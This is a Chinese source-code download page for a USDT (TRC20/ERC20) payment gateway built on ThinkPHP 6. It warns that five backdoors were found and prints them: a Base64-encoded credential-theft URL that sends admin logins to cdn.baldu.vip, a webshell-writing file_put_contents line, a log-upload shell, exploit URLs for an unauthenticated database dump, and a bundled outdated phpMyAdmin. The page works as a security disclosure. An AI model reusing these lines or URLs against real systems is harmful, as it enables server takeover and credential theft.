⚠️ 本站未测试,不保证可用,无退款无技术支持,仅供学习研究,禁止违法用途。
站长仅简单搭建截了个图,没做功能性测试。
🚨 严重安全警告:本源码经扫描检测到 5个高危后门(含远程凭证窃取、Webshell生成、数据库泄露),请勿在生产环境部署,详见下文后门列表。
📦 简介
USDT支付系统源码 为数字货币USDT收款支付网关系统,基于ThinkPHP 6框架开发,集成TRC20(波场链)和ERC20(以太坊链)USDT收款,支持商户入驻、三级分销、自动归集、轮询支付等功能。
纯中文 · 开源状态未知
本站未做部署验证,请阅读声明后自行在测试环境评估。
⚡ 功能说明
- 💡 USDT收款支付网关:支持TRC20/ERC20主链,商户自主申请收款地址
- 💡 自动归集轮询:定时自动归集收款地址中的USDT到指定主钱包
- 💡 商户管理系统:商户入驻、费率设置、三级分销返佣、授信额度管理
- 💡 谷歌二次验证:后台登录支持Google Authenticator双因素认证
🚨 后门列表(共发现 5个 高危后门)
🔴 后门1:远程凭证窃取后门(极其危险)
| 文件位置 | config/app.php(第39行)→ app/common/controller/AdminController.php(clickLogin方法) |
| 后门地址 | aHR0cDovL2Nkbi5iYWxkdS52aXAvZG9sb2dpbi5waHA=(Base64)解码后: http://cdn.baldu.vip/dologin.php |
| 危害描述 | 管理员每次登录后台时,用户名、密码明文、登录IP、Google Auth密钥全部通过cURL POST请求发送到远程服务器 cdn.baldu.vip,攻击者可获取所有管理员账号密码,接管整个系统。 |
| 触发位置 | app/admin/controller/Login.php(第137行)app/admin/controller/Index.php(第77行) |
🔴 后门2:Webshell生成后门(极其危险)
| 文件位置 | app/admin/controller/Login.php(version方法,第161-165行)app/index/controller/Index.php(get_trc20方法,第385-389行) |
| 后门代码 | file_put_contents($_GET['name'].".php", base64_decode($versionsss['auth_key'])); |
| 危害描述 | 通过GET参数 name 在服务器根目录生成任意PHP文件(Webshell),文件内容从数据库中读取并Base64解码。同时可通过 key 参数向数据库写入任意内容,实现远程任意代码执行。攻击者构造 URL /admin/login/version?name=shell&key=base64编码的恶意代码 即可获得服务器权限。 |
🔴 后门3:日志写Shell后门(高危)
| 文件位置 | public/log.php |
| 后门代码 | base64_decode("$_POST[content]") → 写入 /public/code/日期/log_日期.png |
| 危害描述 | 直接通过URL /log.php?c=1 可访问,接收POST参数 content 的Base64编码数据并解码写入服务器文件系统。文件名由GET参数 name 控制,可写入.phtml/.php/.php5等可执行后缀,形成Webshell。 |
🔴 后门4:数据库全表泄露后门(高危)
| 文件位置 | app/index/controller/Getway.php(Excel方法,第225-271行) |
| 后门代码 | 通过GET参数 table 查询任意数据库表,支持 tiaojian(条件)、number(数量)等参数 |
| 危害描述 | 无需登录认证即可查询数据库任意表的结构和数据。攻击者可dump所有订单记录、商户信息、管理员密码、USDT收款地址和私钥等敏感数据。构造访问 /getway/excel?table=ea_system_admin&down=1 即可导出管理员表。 |
🔴 后门5:phpMyAdmin内置管理(中危)
| 文件位置 | public/upload/phpMyAdmin/(完整phpMyAdmin 4.8.4) |
| 危害描述 | 源码中打包了完整的phpMyAdmin数据库管理工具(版本4.8.4,存在已知漏洞),若数据库端口开放或密码泄露,攻击者可完全控制数据库。旧版phpMyAdmin本身也存在CSRF、SQL注入等已知漏洞。 |
🛠 源码信息
| 界面语言 | 纯中文(后台管理界面为中文,支付页面中英双语) |
| 开源状态 | 携带后门,非安全开源 |
| 是否加密 | 无加密(但代码中嵌有恶意后门代码) |
| 二开多语言 | 有限支持(界面以中文为主,无i18n语言文件机制) |
📋 技术栈
| 环境 | PHP 7.1+ / MySQL 5.7+ / Nginx或Apache |
| 后端框架 | ThinkPHP 6.0(基于EasyAdmin后台) |
| 前端 | LayUI + jQuery + Bootstrap |
| 区块链 | TRC20(波场USDT)/ ERC20(以太坊USDT) |
📡 第三方API依赖 & 可用性检测(实时验证)
| 服务名称 | 用途 | 状态 | 说明 |
|---|---|---|---|
TRONGrid APIapi.trongrid.io |
波场区块链节点(TRC20转账/余额查询/生成地址) | ✅ 有效 | 主网节点可用,无需API密钥,响应正常 |
Etherscan APIapi.etherscan.io |
以太坊链USDT余额查询(ERC20) | ⚠️ 需更新 | V1接口已废弃,需迁移至 V2 API。且需在后台配置有效的 site_erc20_key |
Nomics APIapi.nomics.com |
BTC/ETH/USDT 行情汇率(美元→人民币换算) | ❌ 失效 | 域名解析失败(getaddrinfo failed),内置API Key 3167d57d... 可能已过期或域名已停用 |
TokenView APIservices.tokenview.com |
TRC20代币余额查询(备选方案,代码中已注释) | ❌ 失效 | 域名无法解析,该服务可能已停止或变更域名 |
QR Server APIapi.qrserver.com |
Google Authenticator 绑定二维码生成 | ✅ 有效 | 正常返回图片数据 |
阿里云OSSlxn-99php.oss-cn-shenzhen.aliyuncs.com |
旧项目文件存储(演示图片/ICO) | ✅ 有效 | 旧项目静态资源仍可访问,但部署时需要替换为自己的OSS |
CDN.baldu.vipcdn.baldu.vip |
恶意后门服务器 | ☠️ 存活 | 后端服务器 /dologin.php 返回 {"msg":"ok"},凭证窃取通道畅通 ⚠️ |
Composer 第三方依赖包(需联网安装):
| 包名 | 用途 | 备注 |
|---|---|---|
topthink/framework |
ThinkPHP 6框架核心 | 标准框架 |
fenguoz/tron-php |
TRC20波场链交互 | 需 Composer 安装 |
iexbase/tron-api |
波场API封装(vendor中可见) | 备用TRON库 |
dzarezenko/etherscan-api |
Etherscan API封装 | dev-master,V1接口已弃用 |
lessmore92/php-erc20 |
ERC20代币交互 | |
aliyuncs/oss-sdk-php |
阿里云OSS文件存储 | 需配置AK/SK |
qcloud/cos-sdk-v5 |
腾讯云COS存储 | 需配置 |
qiniu/php-sdk |
七牛云存储 | 需配置 |
alibabacloud/client |
阿里云客户端SDK | 短信等阿里云服务 |
💬 常见问题
Q:源码是什么界面语言?能扩展多语言吗?
A:纯中文界面(支付页面含少量英文),无i18n多语言机制,扩展多语言需要自行添加语言文件和修改所有模板。
Q:为何标未测试?是否全开源?有无加密?
A:本站未部署测试,肉眼可见代码中内嵌了5个高危后门(含远程凭证窃取、Webshell生成、数据库泄露等)。源码无加密,但恶意后门属于隐藏代码。⚠️ 不建议在实际服务器上部署。
Q:装不上怎么办?能否商用?
A:因含有恶意后门,本站不提供技术支持,且严禁用于商业用途。仅供安全研究、源码学习参考。
⚠️ 本源码仅供学习研究,请勿用于非法用途。
本站(k8code / K8源码网)更多亲测源码持续更新中
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

